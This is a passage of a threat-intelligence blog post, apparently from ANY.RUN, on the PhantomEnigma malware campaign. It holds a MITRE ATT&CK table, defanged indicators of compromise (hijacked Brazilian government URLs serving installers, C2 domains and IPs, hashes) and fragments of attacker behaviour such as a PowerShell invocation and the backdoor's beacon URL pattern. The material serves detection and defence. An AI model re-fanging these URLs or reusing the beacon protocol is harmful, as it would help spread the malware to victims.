<p class="wp-block-paragraph">PhantomEnigma&nbsp;remains&nbsp;difficult to track because its infrastructure changes faster than&nbsp;its code. Domains rotate&nbsp;weekly,&nbsp;compromised government portals change over time,&nbsp;and some malicious samples still receive clean&nbsp;verdicts. The most reliable signal is the recurring build chain: a Delphi-compiled Inno Setup installer that deploys a patched Electron application&nbsp;containing&nbsp;an&nbsp;obfuscated index.js backdoor.&nbsp;</p>



<p class="wp-block-paragraph">Using&nbsp;ANY.RUN’s&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive&nbsp;Sandbox</a>&nbsp;and&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat&nbsp;Intelligence</a>, our&nbsp;analysts connected activity spread across clean&nbsp;verdicts, rotating infrastructure,&nbsp;and several delivery arms.&nbsp;Sandbox&nbsp;analysis exposed the execution chain, dropped files, persistence,&nbsp;and live network behavior, while TI Lookup&nbsp;and YARA helped&nbsp;identify&nbsp;related activity beyond known domains&nbsp;and file hashes.&nbsp;</p>



<p class="wp-block-paragraph">The investigation also showed why careful attribution matters. Shared tools, hosting providers, or naming patterns are not enough to prove that separate clusters belong to the same operator. By combining code-level evidence, infrastructure&nbsp;analysis, vendor corroboration,&nbsp;and live re-detonation,&nbsp;<a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>&nbsp;analysts documented a second&nbsp;PhantomEnigma&nbsp;beacon generation not covered in&nbsp;previous&nbsp;public research.&nbsp;</p>



<p class="wp-block-paragraph">Security teams can&nbsp;apply these findings to hunt for the stable build chain, investigate clean&nbsp;analyses with matching network behavior,&nbsp;monitor&nbsp;compromised government infrastructure,&nbsp;and add validated C2 indicators to their security controls.&nbsp;ANY.RUN&nbsp;provides the&nbsp;sandbox&nbsp;visibility&nbsp;and&nbsp;threat&nbsp;intelligence needed to detect related activity earlier, shorten investigations,&nbsp;and&nbsp;contain&nbsp;compromise before it creates wider business impact.&nbsp;</p>



<h2 class="wp-block-heading">About&nbsp;ANY.RUN&nbsp;</h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN</strong></a>&nbsp;is a leading provider of interactive malware&nbsp;analysis&nbsp;and threat intelligence solutions trusted by more than&nbsp;15,000 organizations worldwide, including 74 of the Fortune 100.  Its&nbsp;<strong><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a></strong> and&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence</strong></a>&nbsp;solutions help SOC teams&nbsp;analyze suspicious  files&nbsp;and URLs, uncover malicious behavior, enrich alerts with actionable context,&nbsp;and connect related activity across files, infrastructure,&nbsp;and campaigns. This enables faster investigations, more confident response decisions,&nbsp;and earlier containment of threats before they create&nbsp;wider&nbsp;business impact.&nbsp;</p>



<h2 class="wp-block-heading">MITRE ATT&amp;CK</h2>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-350"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="15"
           data-wpID="350"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-FFFFFF"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Tactic                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-FFFFFF"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Technique (ID)                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-FFFFFF"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Evidence                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Resource Development                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Compromise Infrastructure (T1584)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        >=20 compromised.gov[.]br portals + mail servers (SPF/DKIM/DMARC pass)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Initial Access                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Spearphishing Link (T1566.002)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        compromised Polícia Civil / "ProcuraçãoDigital" leading to a download link                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Execution                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        User Execution: Malicious File (T1204.002)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        victim runs the Inno-Setup installer                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Execution                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        JavaScript (T1059.007)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        index.js eval() /taskExecute in the Electron runtime                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Execution                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        PowerShell (T1059.001)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        stdin-fed powershell -ExecutionPolicyUnrestricted                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Defense Evasion                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Obfuscated Files (T1027)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        charCodeAt self-deobfuscatingindex.js; Inno packing                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Defense Evasion                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Masquerading (T1036)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        patched Boost Note.exerenamedGrape.exe; word-salad install dirs                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Defense Evasion                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Sandbox Evasion (T1497)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        sc query "Warsaw Technology", WMI VM checks (part of the clean bucket)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Persistence                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Registry Run Keys (T1547.001)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        index.js sets HKCU …\Run +setLoginItemSettings                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Persistence                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Scheduled Task (T1053.005)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        KalebAutoRun (sibling getloader arm)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Discovery                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        System / Domain Info (T1082 / T1016)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C12"
                    data-col-index="2"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        echo %COMPUTERNAME%.%USERDNSDOMAIN%recon                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A13"
                    data-col-index="0"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        Command & Control                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B13"
                    data-col-index="1"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        Web Protocols (T1071.001)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C13"
                    data-col-index="2"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        hxxp /laravel.php +/nbw/ base64/JSON sysinfo beacon                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A14"
                    data-col-index="0"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        Command & Control                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B14"
                    data-col-index="1"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        Proxy (T1090)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C14"
                    data-col-index="2"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        Cloudflare fronting of delivery C2                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A15"
                    data-col-index="0"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        Exfiltration                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B15"
                    data-col-index="1"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        Exfil Over C2 (T1041)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C15"
                    data-col-index="2"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        COMPUTERNAME+USERNAME+mutex in the beacon body                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-350'>
table#wpdtSimpleTable-350{ table-layout: fixed !important; }
table#wpdtSimpleTable-350 td, table.wpdtSimpleTable350 th { white-space: normal !important; }
.wpdt-bc-FFFFFF { background-color: #FFFFFF !important;}
</style>




<h2 class="wp-block-heading">IOCs &amp; Artifacts&nbsp;</h2>



<p class="wp-block-paragraph"><strong>Compromised gov domains:</strong>&nbsp;</p>



<div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained">
<ul class="wp-block-list">
<li>areal.rj.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>camaradelassance.mg.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>camaraparaguacu.sp.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>circ.rs.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>condemat.sp.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>ferrazdevasconcelos.sp.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>floresdegoias.go.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>funrespol.pc.ro.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>lontra.mg.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>marapoama.sp.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>pinhalgrande.rs.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>poa.sp.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>protocolo.sorocaba.sp.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>seplag.mt.gov[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>policiacivil.pe.gov[.]br&nbsp;</li>
</ul>
</div></div>



<p class="wp-block-paragraph"><strong>Compromised gov URLs:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>hxxps://arcese.urlsand.com/?u=hxxps%3A%2F%2Fcamaraparaguacu.sp.gov[.]br%2Foficio%2Fx2eDBGceCF&amp;e=dd4b7717&amp;h=be3cf1fa&amp;f=y&amp;p=y&amp;m=4gql0c4CXBz334D&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://camaradelassance.mg.gov[.]br&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://camaraparaguacu.sp.gov[.]br/doc&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://camaraparaguacu.sp.gov[.]br/doc/DcUXKm/S7q88t&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://camaraparaguacu.sp.gov[.]br/doc/DzAe8Sxvca&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://camaraparaguacu.sp.gov[.]br/doc/i00hqHrGFr&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://camaraparaguacu.sp.gov[.]br/doc/js[.]brnUl8Z&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://camaraparaguacu.sp.gov[.]br/doc/naNXNW0tQ7&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://camaraparaguacu.sp.gov[.]br/doc/R0RU5TEpc2&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://camaraparaguacu.sp.gov[.]br/doc/wsVPWyP0iL&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://camaraparaguacu.sp.gov[.]br/oficio/mGeI1KrXIT&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://cas5-0-urlprotect.trendmicro.com/wis/clicktime/v1/query?url=hxxps%3a%2f%2fpoa.sp.gov[.]br%2fdown.php&amp;umid=a1a41f4a-228b-4622-9a1f-5fd4cbc68d26&amp;rct=1779114363&amp;auth=18576cf8abd7812271cef15c8c401c7207caa231-a9e499076e60cd525b23d7c667f1929bc0a9b294&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://circ.rs.gov[.]br/OficioDigital.exe&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://condemat.sp.gov[.]br/certificate/APL3SJ9e/723406349/&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://ferrazdevasconcelos.sp.gov[.]br/down.php&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://floresdegoias.go.gov[.]br/levantamento/v6aq7x/prm9yG&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://lontra.mg.gov[.]br/arquivo.php&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://marapoama.sp.gov[.]br/doc/4h7Bae/Mn9K3N&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://marapoama.sp.gov[.]br/documento/L5fHnY/d13mLf&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://marapoama.sp.gov[.]br/levantamento/M5nkwP/dM0CgC&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://marapoama.sp.gov[.]br/oficio/LA9ks3d/ldo9JodAS/vYnerL/fkeA5r&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://poa.sp.gov[.]br/doc/k9l00oFolA/4mZKTCE4ex&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://poa.sp.gov[.]br/doc/KhDvexT9QX/t4iVaErskj&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://poa.sp.gov[.]br/doc/wBvCEwP3tO/oSKmMKG1sw&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://poa.sp.gov[.]br/documento/3QFKMM71/527058494/&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://poa.sp.gov[.]br/download/7552PRc3/544840142/&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://poa.sp.gov[.]br/oficio/anexo/VQC7WEcf&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://protocolo.sorocaba.sp.gov[.]br/protocolo/kitsigns.jsp?yd=DtmcOmPD4GdPF9H06LU6tVN8lm2467QxWGDEOmFL0qWjScIylunV8re%2B0cZMiJ6O&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://protocolo.sorocaba.sp.gov[.]br/protocolo/signkit.jsp?yd=5F8bz2Lapfi%2Bf41ZRmsNAtfvOls6zkkpOSPYO4UqALf0x8Hv%2BZcPRgcBznBl0tH&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://url.de.m.mimecastprotect.com/s/cFJoCr2PqncDzNRl7U7fmf4fQ3q?domain=camaraparaguacu.sp.gov[.]br&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://www.funrespol.pc.ro.gov[.]br/procedimento/aQbax7Lq4R&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps://www.pinhalgrande.rs.gov[.]br/down.php&nbsp;</li>
</ul>



<p class="wp-block-paragraph"><strong>Malicious domains:</strong>&nbsp;</p>



<div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained">
<ul class="wp-block-list">
<li>188.137.246[.]189 91.92.241[.]181&nbsp;&nbsp;</li>



<li>dahieenloo[.]com&nbsp;&nbsp;</li>



<li>eeresofeuae[.]com </li>



<li>logs.zabbxsoftware[.]com&nbsp;&nbsp;</li>



<li>oauth.openvpnet[.]com&nbsp;&nbsp;</li>



<li>oficiospolicia[.]com&nbsp;&nbsp;</li>



<li>pccvill[.]com&nbsp;&nbsp;</li>



<li>pccvioo[.]com&nbsp;&nbsp;</li>



<li>psznaoehteeh[.]com&nbsp;&nbsp;</li>



<li>zsxocjarsate[.]com&nbsp;</li>
</ul>
</div></div>



<p class="wp-block-paragraph"><strong>Load-bearing indicators:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Fingerprint</strong>:&nbsp;tags&nbsp;delphi&nbsp;∧&nbsp;inno&nbsp;∧ installer ∧&nbsp;nodejs&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Backdoor protocol:</strong>&nbsp;*/laravel.php?api=api&amp;hash=*&amp;message=PT1n*&nbsp;(GET, base64 in URL)&nbsp;and&nbsp;POST */nbw/&nbsp;(JSON&nbsp;[id, COMPUTERNAME, USERNAME, tag];&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Beacon C2:</strong>&nbsp;185.219.83[.]191,&nbsp;188.137.246[.]189&nbsp;(AS214943 RAILNET).&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Delivery C2:</strong>&nbsp;policiacivilmg[.]com,&nbsp;dahieenloo[.]com,&nbsp;pccvill[.]com,&nbsp;pccvioo[.]com,&nbsp;taaeiuep[.]com,&nbsp;psznaoehteeh[.]com,&nbsp;eeresofeuae[.]com,&nbsp;zsxocjarsate[.]com.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Origin:</strong>&nbsp;158.94.208[.]120&nbsp;/&nbsp;91.92.241[.]181&nbsp;(AS202412 OMEGATECH-AS, Seychelles).&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Anchor hash:</strong>&nbsp;Procuracao_Digital.exe&nbsp;sha256&nbsp;e0dae1a04b7a3b2ae07377b0fd00681e9633532788870b3709a9e149f3ccf0e0.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Dropped backdoor hash:</strong>&nbsp;index.js&nbsp;sha256&nbsp;71f6997866…2ab71c.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Sibling arm:</strong>&nbsp;novoservidor2026[.]com&nbsp;+&nbsp;KalebAutoRun&nbsp;(21/21 malicious, disjoint).&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Ofício&nbsp;delivery arm:</strong>&nbsp;zabbxsoftware[.]com,&nbsp;oauth.openvpnet[.]com&nbsp;(rotated kit / CS C2),&nbsp;195.177.94[.]103&nbsp;/&nbsp;.193,&nbsp;79.110.49[.]32; CS/Shellter&nbsp;loader&nbsp;7de52b73…296e1f64.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Compromised delivery:</strong>&nbsp;timon.ma.gov[.]br,&nbsp;protocolo.sorocaba.sp.gov[.]br,&nbsp;prodoc.ap.gov[.]br,&nbsp;portaldrh.tjba.jus[.]br,&nbsp;marapoama.sp.gov[.]br,poa.sp.gov[.]br,&nbsp;loginam.sesp.es.gov[.]br,&nbsp;aplicacao.cbm.mt.gov[.]br.&nbsp;</li>
</ul>



<p class="wp-block-paragraph"><strong>Example detonations:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/b842921c-adbb-4286-a174-a8dc69450d32" target="_blank" rel="noreferrer noopener">https://app.any.run/tasks/b842921c-adbb-4286-a174-a8dc69450d32</a>&nbsp;(representative core; beacons live to&nbsp;185.219.83[.]191&nbsp;yet verdict = clean)&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/ed34b2bd-123f-4463-9c75-856118618c29" target="_blank" rel="noreferrer noopener">https://app.any.run/tasks/ed34b2bd-123f-4463-9c75-856118618c29</a>&nbsp;; live&nbsp;POST&nbsp;zsxocjarsate[.]com/nbw/, verdict Malicious)&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/41ce7f62-d97e-4c84-9f70-dfb5fafcfb39" target="_blank" rel="noreferrer noopener">https://app.any.run/tasks/41ce7f62-d97e-4c84-9f70-dfb5fafcfb39</a>&nbsp;(C2 beacon pierces Cloudflare, reaching the OMEGATECH origin)&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/2803b131-be65-428a-b00d-4217c55dd605" target="_blank" rel="noreferrer noopener">https://app.any.run/tasks/2803b131-be65-428a-b00d-4217c55dd605</a>&nbsp;(.gov[.]br&nbsp;delivery)&nbsp;</li>
</ul>



<p class="wp-block-paragraph"><strong>Sources</strong>:</p>



<ul class="wp-block-list">
<li>Positive Technologies (PT‑ESC),&nbsp;<em>Operation Phantom Enigma</em>,&nbsp;https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/operation-phantom-enigma/: actor, Brazil-first victimology, extension-banker arm.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Positive Technologies (PT‑ESC),&nbsp;<em>Phantom in the flesh: new attacks by Phantom Enigma</em>,&nbsp;https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-in-the-flesh-new-attacks-by-phantom-enigma/:&nbsp;getloader.php,&nbsp;KalebAutoRun, MSI banker&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>The Hacker News,&nbsp;<em>Malicious Browser Extensions Infect Over 722 Users Across Latin America</em>&nbsp;(2025‑06): 722-install corroboration.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>abuse.ch&nbsp;ThreatFox:&nbsp;taaeiuep[.]com&nbsp;INNOSETUP+ProcuracaoDigital+brazil&nbsp;(conf 75)&nbsp;and&nbsp;45.141.119[.]188&nbsp;win.stealc,&nbsp;hxxps://threatfox.abuse[.]ch.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>ANY.RUN&nbsp;Threat&nbsp;Intelligence, the&nbsp;PhantomEnigma&nbsp;boostnote/Node.js/DGA-arm writeup (hunt seed): the only source naming the&nbsp;boostnote/laravel.php&nbsp;arm.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Ofício-PC arm: Polícia Civil SC public QR-summons alert;&nbsp;ANY.RUN&nbsp;<em>agenteV2</em>&nbsp;blog&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Special Thanks&nbsp;</h2>



<p class="wp-block-paragraph">We would like to thank <a href="https://x.com/rifteyy" target="_blank" rel="noreferrer noopener">Rifteyy</a>, an <a href="https://rifteyy.org/" target="_blank" rel="noreferrer noopener">Independent Malware Analyst</a>, for sharing an interesting lead that helped set this investigation in motion. The tip gave our researchers a valuable starting point for further analysis and validation.</p>



<p class="wp-block-paragraph">ANY.RUN&nbsp;supports open collaboration across the security community. If you have relevant samples or would like to work with us on a joint investigation, contact our team. By sharing&nbsp;expertise&nbsp;and findings, we can&nbsp;expose malicious activity faster&nbsp;and make the&nbsp;threat&nbsp;landscape safer for everyone.&nbsp;</p>
<p>The post <a href="https://any.run/cybersecurity-blog/phantomenigma-research/">Hidden Infrastructure Exposed: ANY.RUN Reveals Hijacked Gov Websites Delivering Malware </a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/phantomenigma-research/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>​​Kratos PhaaS Targets US and EU: How to Reduce Microsoft 365 Account Takeover Risk​</title>
		<link>https://any.run/cybersecurity-blog/kratos-phaas-account-takeover/</link>
					<comments>https://any.run/cybersecurity-blog/kratos-phaas-account-takeover/#respond</comments>
		
		<dc:creator><![CDATA[ShiFu]]></dc:creator>
		<pubDate>Tue, 14 Jul 2026 10:06:03 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=22043</guid>

